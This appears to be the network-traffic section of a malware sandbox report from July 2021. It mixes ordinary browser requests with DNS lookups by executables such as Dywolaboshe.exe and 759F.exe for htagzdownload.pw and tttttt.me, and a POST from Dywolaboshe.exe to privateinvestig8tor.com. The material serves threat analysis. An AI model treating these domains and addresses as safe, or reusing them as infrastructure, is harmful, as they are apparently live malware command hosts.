                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=dYrhglSZKXdKWcS9tfN%2FeottDcnqgBd2OpLeVWFxeFKG%2FCOAXW36NVYn7GgsyLar4hi%2BjT%2FFP%2BtWicd0hcn5%2BeqYHk0vigJDnXItnzHtlHCR3b1l7tpeSc89EFBmTuICRrA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326a4ab80c81-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/webfonts/free-fa-solid-900.woff2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/webfonts/free-fa-solid-900.woff2 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          content-type: font/woff2
                                                                                          content-length: 78212
                                                                                          last-modified: Wed, 17 Mar 2021 02:28:18 GMT
                                                                                          etag: "4e463cfb29c596ba3bb8b0c2469914e5"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          access-control-max-age: 3000
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 51d16867ea09d1b4c52eca0e090ad4a3.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: i9kFFxj8TSfHFFnOSK3JNTHQrwWufCYD6qq4Cf4Bwd8fDU0LUQvWSw==
                                                                                          age: 987339
                                                                                          cf-cache-status: HIT
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=3v3BKP7FqBcn27wLbUlUkkgvdpu9V7CYWkjSvJxnoiQBiVvEYCLM47dTxQCJ9RtaxRnLazUcwJg6b%2BttDdbd0Qyj35tpNcXmEzSnoBo4A4E2zRgx6UYgm6fO8PFrjAxJaIg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326dbee10c81-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/webfonts/free-fa-regular-400.woff2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/webfonts/free-fa-regular-400.woff2 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          content-type: font/woff2
                                                                                          content-length: 13292
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-max-age: 3000
                                                                                          last-modified: Wed, 17 Mar 2021 02:28:17 GMT
                                                                                          etag: "3f46d884913ca952661ea484e4646fd2"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 9385401cebb473e4ed1da6c81b927c52.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS1-C1
                                                                                          x-amz-cf-id: LtDf5aIysm7dFtoft25--nTPE-zHtjRG16JgH5tEsLS1X5U7YLtrqw==
                                                                                          age: 260351
                                                                                          cf-cache-status: HIT
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=uqZw8w1roJa4o7r5oepybvRAyXjag9VKED8n1Y5dKV2u4fQMJ8ypRZgAhQs8CGKUQdDlcXmBhFydmJkQCCD1e9aZgKPoFT7baizAO5q8IoC6cah%2BAwaI%2BBf4tKEAa4%2F7GHo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326e1f650c81-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://ka-f.fontawesome.com/releases/v5.15.3/webfonts/free-fa-v4deprecations.woff2
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.64.133.9:443
                                                                                          Request
                                                                                          GET /releases/v5.15.3/webfonts/free-fa-v4deprecations.woff2 HTTP/2.0
                                                                                          host: ka-f.fontawesome.com
                                                                                          accept: */*
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          origin: https://www.utopia-network.org
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:05:25 GMT
                                                                                          content-type: font/woff2
                                                                                          content-length: 6832
                                                                                          access-control-allow-origin: *
                                                                                          access-control-allow-methods: GET
                                                                                          access-control-max-age: 3000
                                                                                          last-modified: Wed, 17 Mar 2021 02:28:18 GMT
                                                                                          etag: "b47073c6673ded317ed90cd96c78a8ea"
                                                                                          cache-control: max-age=31556926
                                                                                          access-control-allow-headers: fa-kit-token
                                                                                          x-cache: Hit from cloudfront
                                                                                          via: 1.1 697a26790d3ab8292d8546ca9be87bbd.cloudfront.net (CloudFront)
                                                                                          x-amz-cf-pop: AMS54-C1
                                                                                          x-amz-cf-id: 8PJiK5SsM---x1mf8OE1s19s6xXrQyvahCro9-uiuJP6lJtnX81j5Q==
                                                                                          age: 886265
                                                                                          cf-cache-status: HIT
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=kPcKDUb7a1M97BnQLq4ZZ8IOvf%2FPQ9XlQMYJY6a0bEZiXxf07ozXAAXc3AY53dfuNcli09XCzXSzyDqiH%2BuzXYpWmxKShVMOO5Hg112iM14EtcfOf4ONX7l%2BRRIZTedZ1yw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c5326e2f7a0c81-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          stats.g.doubleclick.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          stats.g.doubleclick.net
                                                                                          IN A
                                                                                          Response
                                                                                          stats.g.doubleclick.net
                                                                                          IN CNAME
                                                                                          stats.l.doubleclick.net
                                                                                          stats.l.doubleclick.net
                                                                                          IN A
                                                                                          142.250.102.156
                                                                                          stats.l.doubleclick.net
                                                                                          IN A
                                                                                          142.250.102.157
                                                                                          stats.l.doubleclick.net
                                                                                          IN A
                                                                                          142.250.102.155
                                                                                          stats.l.doubleclick.net
                                                                                          IN A
                                                                                          142.250.102.154
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j91&tid=UA-166755442-7&cid=736343894.1625878909&jid=1448099274&gjid=417027051&_gid=1931332999.1625878909&_u=YEBAAUAAAAAAAC~&z=745282342
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          142.250.102.156:443
                                                                                          Request
                                                                                          POST /j/collect?t=dc&aip=1&_r=3&v=1&_v=j91&tid=UA-166755442-7&cid=736343894.1625878909&jid=1448099274&gjid=417027051&_gid=1931332999.1625878909&_u=YEBAAUAAAAAAAC~&z=745282342 HTTP/2.0
                                                                                          host: stats.g.doubleclick.net
                                                                                          accept: */*
                                                                                          origin: https://www.utopia-network.org
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          content-type: text/plain
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          content-length: 0
                                                                                          cache-control: no-cache
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          access-control-allow-origin: https://www.utopia-network.org
                                                                                          strict-transport-security: max-age=10886400; includeSubDomains; preload
                                                                                          date: Fri, 09 Jul 2021 23:05:27 GMT
                                                                                          pragma: no-cache
                                                                                          expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                          cache-control: no-cache, no-store, must-revalidate
                                                                                          last-modified: Sun, 17 May 1998 03:00:00 GMT
                                                                                          access-control-allow-credentials: true
                                                                                          x-content-type-options: nosniff
                                                                                          content-type: text/plain
                                                                                          cross-origin-resource-policy: cross-origin
                                                                                          server: Golfe2
                                                                                          content-length: 4
                                                                                          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.google.nl
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.google.nl
                                                                                          IN A
                                                                                          Response
                                                                                          www.google.nl
                                                                                          IN A
                                                                                          172.217.168.227
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.google.nl/ads/ga-audiences?t=sr&aip=1&_r=4&slf_rd=1&v=1&_v=j91&tid=UA-166755442-7&cid=736343894.1625878909&jid=1448099274&_u=YEBAAUAAAAAAAC~&z=2071940509
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.217.168.227:443
                                                                                          Request
                                                                                          GET /ads/ga-audiences?t=sr&aip=1&_r=4&slf_rd=1&v=1&_v=j91&tid=UA-166755442-7&cid=736343894.1625878909&jid=1448099274&_u=YEBAAUAAAAAAAC~&z=2071940509 HTTP/2.0
                                                                                          host: www.google.nl
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.utopia-network.org/
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          p3p: policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
                                                                                          timing-allow-origin: *
                                                                                          cross-origin-resource-policy: cross-origin
                                                                                          date: Fri, 09 Jul 2021 23:05:27 GMT
                                                                                          pragma: no-cache
                                                                                          expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                          cache-control: no-cache, no-store, must-revalidate
                                                                                          content-type: image/gif
                                                                                          x-content-type-options: nosniff
                                                                                          server: cafe
                                                                                          content-length: 42
                                                                                          x-xss-protection: 0
                                                                                          alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          htagzdownload.pw
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          htagzdownload.pw
                                                                                          IN A
                                                                                          Response
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://privateinvestig8tor.com/t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg
                                                                                          Dywolaboshe.exe
                                                                                          Remote address:
                                                                                          162.0.220.187:80
                                                                                          Request
                                                                                          POST /t7gu47xyp4mj4ekapans/zkau68gvw5aqjawnxpeg HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Host: privateinvestig8tor.com
                                                                                          Content-Length: 180
                                                                                          Expect: 100-continue
                                                                                          Accept-Encoding: gzip
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx/1.21.0
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          X-RateLimit-Limit: 60
                                                                                          X-RateLimit-Remaining: 56
                                                                                          Date: Fri, 09 Jul 2021 23:07:41 GMT
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          server: nginx/1.17.6
                                                                                          date: Fri, 09 Jul 2021 23:08:58 GMT
                                                                                          content-type: text/html
                                                                                          p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                                          set-cookie: u_pl=14576783; expires=Sat, 10 Jul 2021 23:08:58 GMT
                                                                                          set-cookie: ain=eyJhbGciOiJIUzI1NiJ9.eyJwIjp7ImlkIjoxNDU3Njc4MywiayI6IjdlODcyZGFiOTlkNzhiZmZjNGFhMGMxZTZiMDYyZGFkIiwic2lkIjoiIiwiaXNpZCI6MiwiYXNpZCI6MSwiemlkIjoxMDY0NzcsInBpZCI6ODUxNTUsImFuIjp0cnVlLCJsYW4iOnRydWUsImNpZCI6MTcsImFpZCI6MjgsInB0Ijo0LCJwayI6ImIxZnNtZGQ5bSIsImNwa3MiOnsgIjM0IjoiYTU4ZjNkZjBiOGUxNWM5Yzk4MmNiMDc0ZGUyNjgzZWYifSwidCI6MX0sInUiOnsidSI6MSwiYXUiOjEsImQiOnsiaWQiOjYwMzc2NywiaWRzIjoiIiwiaWMiOmZhbHNlLCJuIjoiRGVza3RvcHxFbXVsYXRvciIsInYiOiJVbmtub3duIiwibSI6IlVua25vd24iLCJmIjoxLCJmbiI6IkRlc2t0b3AiLCJvaWQiOjM4OTE0LCJvbiI6IldpbmRvd3MiLCJvdiI6IjEwLjAiLCJiaWQiOjY4MDAxLCJibiI6IkVkZ2UiLCJidiI6IjE1Iiwid3YiOmZhbHNlLCJlIjpmYWxzZSwiYWIiOmZhbHNlfSwiYyI6eyJpZCI6MjIzLCJjIjoiVVMiLCJuIjoiVW5pdGVkIFN0YXRlcyJ9LCJhIjpmYWxzZSwiY3IiOnsibiI6IkNvZ2VudCBDb21tdW5pY2F0aW9ucyJ9LCJ4ZiI6IiIsIml4ZiI6ZmFsc2UsImlneGYiOmZhbHNlLCJ1cCI6dHJ1ZSwiciI6IiJ9fQ.zSzqFXOc-ReMjzaDNv_HybfTdwdxzUhLVp19wxeCfpc; expires=Fri, 09 Jul 2021 23:09:58 GMT
                                                                                          expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                          cache-control: no-cache
                                                                                          x-request-id: 1fb8498bf941941e498591412e7f70d1
                                                                                          strict-transport-security: max-age=0; includeSubdomains
                                                                                          content-encoding: gzip
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.profitabletrustednetwork.com/b1fsmdd9m?shu=27766581578b28279d1d029857cc4ea614c316466789d8a490386c4c72c420f3f5bbf23f871c939400b5ca23e0ea3379ba26abd69c0a33c8cd8669dd6727841ef49ad6fabff13718eb930977a99e8242eb735bc34dfe57a9762258ec1de866&pst=1625872198&rmtc=t&uuid=0b8bbe70-be9a-42b1-aa35-c9d6f01dc0e2%3A1%3A1&pii=&in=false&key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          192.243.59.13:443
                                                                                          Request
                                                                                          GET /b1fsmdd9m?shu=27766581578b28279d1d029857cc4ea614c316466789d8a490386c4c72c420f3f5bbf23f871c939400b5ca23e0ea3379ba26abd69c0a33c8cd8669dd6727841ef49ad6fabff13718eb930977a99e8242eb735bc34dfe57a9762258ec1de866&pst=1625872198&rmtc=t&uuid=0b8bbe70-be9a-42b1-aa35-c9d6f01dc0e2%3A1%3A1&pii=&in=false&key=7e872dab99d78bffc4aa0c1e6b062dad HTTP/2.0
                                                                                          host: www.profitabletrustednetwork.com
                                                                                          accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                          referer: https://www.profitabletrustednetwork.com/b1fsmdd9m?key=0f22c1fd609f13cb7947c8cabfe1a90d&submetric=14576783
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          cookie: u_pl=14576783; cjs=t
                                                                                          Response
                                                                                          HTTP/2.0 302
                                                                                          server: nginx/1.17.6
                                                                                          date: Fri, 09 Jul 2021 23:08:58 GMT
                                                                                          content-type: text/html
                                                                                          content-length: 0
                                                                                          location: https://typiccor.com/kKQhPEMgbpfpPY1Tk7zFlGtbiyW7ZUCqVcQgbppQLG0/?clck=5ba17bae056a51dcf980a730fdaf383f&sid=14576783
                                                                                          p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
                                                                                          set-cookie: uid_id2=0b8bbe70-be9a-42b1-aa35-c9d6f01dc0e2:1:1; expires=Fri, 16 Jul 2021 23:08:58 GMT
